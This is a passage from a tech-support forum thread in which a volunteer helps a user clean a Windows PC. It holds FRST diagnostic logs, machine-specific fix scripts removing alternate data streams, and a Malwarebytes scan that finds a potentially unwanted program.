Description: Faulting application name: svchost.exe_CDPSvc, version: 10.0.19041.1806, time stamp: 0x7dcad237
Faulting module name: cdp.dll, version: 10.0.19041.1826, time stamp: 0xe5ddbd74
Exception code: 0xc0000005
Fault offset: 0x00000000001451ff
Faulting process id: 0x1520
Faulting application start time: 0x01d89c829cc7efa7
Faulting application path: C:\WINDOWS\system32\svchost.exe
Faulting module path: c:\windows\system32\cdp.dll
Report Id: 50c9c99a-2db9-4d51-bb30-dcebff169f98
Faulting package full name:
Faulting package-relative application ID:
Error: (07/20/2022 02:54:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x27b4
Faulting application start time: 0x01d89c829f608f78
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 4c2824dc-054c-458b-bf06-acee4e0fbe48
Faulting package full name:
Faulting package-relative application ID:
Error: (07/20/2022 12:09:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x2560
Faulting application start time: 0x01d89c6b86e1e516
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 36268887-0b3d-4e32-858a-d948616f78fa
Faulting package full name:
Faulting package-relative application ID:
Error: (07/19/2022 04:53:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x1b84
Faulting application start time: 0x01d89bca0673daf3
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: c471ce9d-4454-44fc-a611-f861db18ddb8
Faulting package full name:
Faulting package-relative application ID:
Error: (07/19/2022 04:46:58 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine QueryFullProcessImageNameW. hr = 0x8007001f, A device attached to the system is not functioning.
.
Operation:
Executing Asynchronous Operation
Context:
Current State: DoSnapshotSet
System errors:
=============
Error: (07/21/2022 03:22:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
This driver has been blocked from loading
Error: (07/21/2022 03:22:23 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Miggy\AppData\Local\Temp\ehdrv.sys
Error: (07/21/2022 03:22:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
This driver has been blocked from loading
Error: (07/21/2022 03:22:23 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Miggy\AppData\Local\Temp\ehdrv.sys
Error: (07/21/2022 03:22:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
This driver has been blocked from loading
Error: (07/21/2022 03:22:23 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Miggy\AppData\Local\Temp\ehdrv.sys
Error: (07/21/2022 03:22:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
This driver has been blocked from loading
Error: (07/21/2022 03:22:23 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Miggy\AppData\Local\Temp\ehdrv.sys
Windows Defender:
================
Date: 2022-07-17 18:02:02
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-15 19:09:08
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-14 11:53:58
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-11 19:01:40
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-10 18:38:28
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
==================== Memory info ===========================
BIOS: American Megatrends Inc. F50 11/28/2019
Motherboard: Gigabyte Technology Co., Ltd. A320M-S2H-CF
Processor: AMD Ryzen 5 3600 6-Core Processor
Percentage of memory in use: 90%
Total physical RAM: 8139.07 MB
Available physical RAM: 779.42 MB
Total Virtual: 21451.07 MB
Available Virtual: 2913.88 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:475.83 GB) (Free:98.4 GB) (Model: TEAM T253X2512G) NTFS
\\?\Volume{590e5d8c-1754-4989-bc02-b0320b4dd94a}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{2461b620-0642-4655-b8ff-4e37ffcad3aa}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS
\\?\Volume{31c301e6-2876-4924-31af-e66339e3d9f1}\ () (Fixed) (Total:0.01 GB) (Free:0 GB) NTFS
\\?\Volume{a7ea1218-f889-4125-8806-9e75e9dba896}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (Protective MBR) (Size: 476.9 GB) (Disk ID: 00000000)
Partition: GPT.
Attempted reading MBR returned 0 bytes.
Could not read MBR for disk 1.
==================== End of Addition.txt =======================
#12
axe0
-
- Malware Response Team
- 2,059 posts
- OFFLINE
- Gender:Male
- Location:Netherlands
- Local time:03:17 AM
Posted 23 July 2022 - 02:26 PM
Please do the following.
Run FRST Fix
Warning: This script was created for this specific system. Attempting to use the fix on another system may cause damage to the system
Malwarebytes
Please download Malwarebytes to your desktop.
In your next post
In your next post, please include the following. Make sure to copy and paste any requested logs unless asked to attach it.
Run FRST Fix
Warning: This script was created for this specific system. Attempting to use the fix on another system may cause damage to the system
- Right-click FRST64.exe then click "Run as administrator".
- Select the entire content of the code below including "Start::" and "End::", right click and select "Copy"
- Click Fix button once and wait
- When finished, it will produce a log called Fixlog.txt in the same directory the tool was run from.
- Please copy and paste the log in your next reply.
Start:: CloseProcesses: EmptyTemp: AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log:AAE9D2281E [4298] AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log_backup1:E79F04DA79 [4298] AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log:5ACBC90093 [4298] AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1:A416BDA264 [4298] AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log:204739A7F2 [4298] AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log_backup1:C3CA1050CA [4298] AlternateDataStreams: C:\ProgramData\rsEngine.config.backup:CF02139FF4 [4298] AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [4298] AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [4298] AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [4298] AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [4298] AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [4298] AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [4298] AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [4298] AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [4298] AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [4298] AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk:E77773B271 [4298] AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [4298] End::----------------------------------------------
Malwarebytes
Please download Malwarebytes to your desktop.
- Right click the downloaded Malwarebytes file and choose Run as Administrator.
- Click Yes when you see the User Account Control prompt.
- Follow the prompts to install the program.
- Right in the top in Malwarebytes click on the settings icon, click Check for updates to download the latest updates.
- Click Scan.
- If potential threats have been detected, check all listed items and click Quarantine Selected.
- While you're still on the Scan tab, click View Report > Export > Copy to clipboard and paste the content of the log in your next post.
In your next post
In your next post, please include the following. Make sure to copy and paste any requested logs unless asked to attach it.
- Content of fixlog.txt
- Content of Malwarebytes log
- How is your computer behaving with the randomly opening and closing of Chrome browser?
Edited by axe0, 23 July 2022 - 02:28 PM.
Fixed formatting
Kind regards,
Axe0
Axe0
#13
miggybruh
- Topic Starter
-
- Members
- 13 posts
- OFFLINE
- Local time:06:17 PM
Posted 26 July 2022 - 03:13 PM
here is fixlog.txt
Fix result of Farbar Recovery Scan Tool (x64) Version: 21-07-2022
Ran by Miggy (26-07-2022 12:53:53) Run:3
Running from C:\Users\Miggy\Downloads
Loaded Profiles: Miggy
Boot Mode: Normal
==============================================
fixlist content:
*****************
Start::
CloseProcesses:
EmptyTemp:
AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log:AAE9D2281E [4298]
AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log_backup1:E79F04DA79 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log:5ACBC90093 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1:A416BDA264 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log:204739A7F2 [4298]
AlternateDataStreams:
C:\ProgramData\NVDisplayContainerWatchdog.log_backup1:C3CA1050CA [4298]
AlternateDataStreams: C:\ProgramData\rsEngine.config.backup:CF02139FF4 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [4298]
AlternateDataStreams:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk:E77773B271 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [4298]
End::
*****************
Processes closed successfully.
C:\ProgramData\NvcDispCorePlugin.log => ":AAE9D2281E" ADS removed successfully
C:\ProgramData\NvcDispCorePlugin.log_backup1 => ":E79F04DA79" ADS removed successfully
C:\ProgramData\NVDisplay.ContainerLocalSystem.log => ":5ACBC90093" ADS removed successfully
C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1 => ":A416BDA264" ADS removed successfully
C:\ProgramData\NVDisplayContainerWatchdog.log => ":204739A7F2" ADS removed successfully
AlternateDataStreams: => Error: No automatic fix found for this entry.
"C:\ProgramData\NVDisplayContainerWatchdog.log_backup1:C3CA1050CA [4298]" => not found
C:\ProgramData\rsEngine.config.backup => ":CF02139FF4" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini => ":B1DA6C571C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk => ":7661CCE9BF" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk => ":0BBB729577" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk => ":638138415C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk => ":C56174E6CE" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini => ":41964AA945" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk => ":BE32D07BC5" ADS removed successfully
AlternateDataStreams: => Error: No automatic fix found for this entry.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [4298]" => not found
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => ":8096E45125" ADS removed successfully
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk" => ":E77773B271" ADS not found.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk => ":578370639A" ADS removed successfully
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 53028474 B
Java, Discord, Steam htmlcache => 613865740 B
Windows/system/drivers => 16701871 B
Edge => 0 B
Chrome => 440845335 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 4130 B
NetworkService => 31258 B
Miggy => 35196042141 B
RecycleBin => 34746675 B
EmptyTemp: => 33.9 GB temporary data Removed.
================================
The system needed a reboot.
==== End of Fixlog 12:55:10 ====
here is malwarebytes log
Malwarebytes
www.malwarebytes.com
-Log Details-
Scan Date: 7/26/22
Scan Time: 12:58 PM
Log File: 63c88364-0d1d-11ed-97ac-b42e99e8c1bf.json
-Software Information-
Version: 4.5.11.202
Components Version: 1.0.1716
Update Package Version: 1.0.57783
License: Trial
-System Information-
OS: Windows 10 (Build 19044.1826)
CPU: x64
File System: NTFS
User: MIGGYPC\Miggy
-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 320930
Threats Detected: 5
Threats Quarantined: 0
Time Elapsed: 5 min, 21 sec
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
-Scan Details-
Process: 0
(No malicious items detected)
Module: 0
(No malicious items detected)
Registry Key: 2
PUP.Optional.RestMinder, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RestMinder_RASAPI32, No Action By User, 2021, 1070718, 1.0.57783, , ame, , ,
PUP.Optional.RestMinder, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RestMinder_RASMANCS, No Action By User, 2021, 1070718, 1.0.57783, , ame, , ,
Registry Value: 0
(No malicious items detected)
Registry Data: 0
(No malicious items detected)
Data Stream: 0
(No malicious items detected)
Folder: 2
PUP.Optional.RestMinder, C:\Users\Miggy\AppData\Local\Gh\RestMinder.exe_Url_u4ip2c5nzthfhomuge0pi1pxxhpotbdx\1.0.0.1, No Action By User, 2021, 1070720, , , , , ,
PUP.Optional.RestMinder, C:\USERS\MIGGY\APPDATA\LOCAL\Gh\RestMinder.exe_Url_u4ip2c5nzthfhomuge0pi1pxxhpotbdx, No Action By User, 2021, 1070720, 1.0.57783, , ame, , ,
File: 1
PUP.Optional.RestMinder, C:\Users\Miggy\AppData\Local\Gh\RestMinder.exe_Url_u4ip2c5nzthfhomuge0pi1pxxhpotbdx\1.0.0.1\user.config, No Action By User, 2021, 1070720, , , , , 4289D301FB845C8CA46594C414552191, 0592B518B0E2DD9188D85744762627B70DD4861AB178824F24F790D3BA32D960
Physical Sector: 0
(No malicious items detected)
WMI: 0
(No malicious items detected)
(end)
Chrome no longer opens and closes randomly and is functioning normally.
#14
axe0
-
- Malware Response Team
- 2,059 posts
- OFFLINE
- Gender:Male
- Location:Netherlands
- Local time:03:17 AM
Posted 27 July 2022 - 11:02 AM
Good news. 
It looks like a part of the fix didn't go through properly, please do the following. After the below fix, please run a new scan with FRST, I'd like to have a look at the logs one more time.
Run FRST Fix
Warning: This script was created for this specific system. Attempting to use the fix on another system may cause damage to the system
- Right-click FRST64.exe then click "Run as administrator".
- Select the entire content of the code below including "Start::" and "End::", right click and select "Copy"
- Click Fix button once and wait
- When finished, it will produce a log called Fixlog.txt in the same directory the tool was run from.
- Please copy and paste the log in your next reply.
Start:: CloseProcesses: AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log_backup1:C3CA1050CA [4298] AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [4298] End::
===============================================
In your next post
In your next post, please include the following. Make sure to copy and paste any requested logs unless asked to attach it.
- Content of fixlog.txt
- Content of FRST.txt
- Content of Addition.txt
Kind regards,
Axe0
Axe0
#15
miggybruh
- Topic Starter
-
- Members
- 13 posts
- OFFLINE
- Local time:06:17 PM
Posted 30 July 2022 - 03:30 PM
Here is fixlog.txt
Fix result of Farbar Recovery Scan Tool (x64) Version: 27-07-2022
Ran by Miggy (30-07-2022 13:14:27) Run:4
Running from C:\Users\Miggy\Downloads
Loaded Profiles: Miggy
Boot Mode: Normal
==============================================
fixlist content:
*****************
Start::
CloseProcesses:
AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log_backup1:C3CA1050CA [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [4298]
End::
*****************
Processes closed successfully.
C:\ProgramData\NVDisplayContainerWatchdog.log_backup1 => ":C3CA1050CA" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk => ":980850BA8A" ADS removed successfully
The system needed a reboot.
==== End of Fixlog 13:14:29 ====
Here is FRST.txt
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27-07-2022
Ran by Miggy (administrator) on MIGGYPC (Gigabyte Technology Co., Ltd. A320M-S2H) (30-07-2022 13:25:08)
Running from C:\Users\Miggy\Downloads
Loaded Profiles: Miggy
Platform: Microsoft Windows 10 Home Version 21H2 19044.1826 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> ) C:\Program Files (x86)\Adobe\Adobe Sync\CoreSync\CoreSync.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud Helper.exe <2>
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\Adobe Installer.exe
(C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2>
(C:\Program Files (x86)\ONN\onn.exe ->) () [File not signed] C:\Program Files (x86)\ONN\KbDaemon.exe
(C:\Program Files (x86)\Origin\Origin.exe ->) (Electronic Arts, Inc. -> ) C:\Program Files (x86)\Origin\QtWebEngineProcess.exe <3>
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe <2>
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe
(C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\libs\node.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCopyAccelerator.exe
(Discord Inc. -> Discord Inc.) C:\Users\Miggy\AppData\Local\Discord\app-1.0.9005\Discord.exe <6>
(explorer.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\Origin.exe
(explorer.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <11>
(explorer.exe ->) (Mega Limited -> Mega Limited) C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe
(explorer.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingApp_2207.1001.6.0_x64__8wekyb3d8bbwe\XboxAppServices.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(explorer.exe ->) (Shenzhen Evision Semiconductor Technology Co., Ltd -> ) C:\Program Files (x86)\ONN\onn.exe
(explorer.exe ->) (Spotify AB -> Spotify Ltd) C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe <6>
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
(Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.67.21001.0_x64__8wekyb3d8bbwe\gamingservices.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.67.21001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe <2>
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe
(svchost.exe ->) (Adobe Systems Incorporated) C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc\AdobeNotificationClient.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxApp_48.89.25001.0_x64__8wekyb3d8bbwe\XboxApp.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.822.6271.0_x64__8wekyb3d8bbwe\GameBar.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.822.6271.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\RtkAudUService64.exe [856288 2019-10-29] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3071232 2022-07-18] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [129288 2021-08-04] (Adobe Inc. -> )
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [850208 2022-05-12] (Adobe Inc. -> Adobe Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Discord] => C:\Users\Miggy\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32706000 2022-07-19] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4230544 2022-07-26] (Valve Corp. -> Valve Corporation)
